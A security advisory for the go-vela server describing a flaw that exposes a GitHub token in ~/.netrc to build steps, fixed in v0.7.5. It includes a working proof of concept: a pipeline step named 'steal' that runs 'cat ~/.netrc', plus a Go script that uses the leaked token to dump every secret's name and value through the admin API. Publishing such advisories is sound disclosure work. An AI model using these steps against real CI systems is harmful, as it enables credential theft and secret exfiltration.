What kind of vulnerability is it? Who is impacted?
The additional auth mechanism added within https://github.com/go-vela/server/pull/246 enables some malicious user to obtain secrets utilizing the injected credentials within the ~/.netrc
file. Steps to reproduce
UPDATE users SET admin = 't' WHERE name = <username>
Add .vela.yml
to the repository with the following content
version: "1"
steps:
- name: steal
image: alpine
commands:
- cat ~/.netrc
Look at build logs to find the following content
$ cat ~/.netrc
machine <GITHUB URL>
login x-oauth-basic
password <token>
Copy the password to be utilized in some later step
Copy the following script into main.go
package main
import (
"fmt"
"github.com/go-vela/sdk-go/vela"
"os"
)
func main() {
// create client to connect to vela
client, err := vela.NewClient(os.Getenv("VELA_SERVER_ADDR"), "vela", nil)
if err != nil {
panic(err)
}
// add PAT to request
client.Authentication.SetPersonalAccessTokenAuth(os.Getenv("VELA_TOKEN"))
secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})
if err != nil {
panic(err)
}
for _, secret := range *secrets {
fmt.Println(*secret.Name)
fmt.Println(*secret.Value)
}
}
Run the main.go
with environment specific settings
VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously> go run main.go
The previously posted script could be updated to utilize any API endpoint(s) the activated user has access against.
Has the problem been patched? What versions should users upgrade to?
v0.7.5
or laterIs there a way for users to fix or remediate the vulnerability without upgrading?
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory
{ "nvd_published_at": "2021-04-09T18:15:00Z", "cwe_ids": [ "CWE-285", "CWE-862", "CWE-863" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-05-20T20:12:26Z" }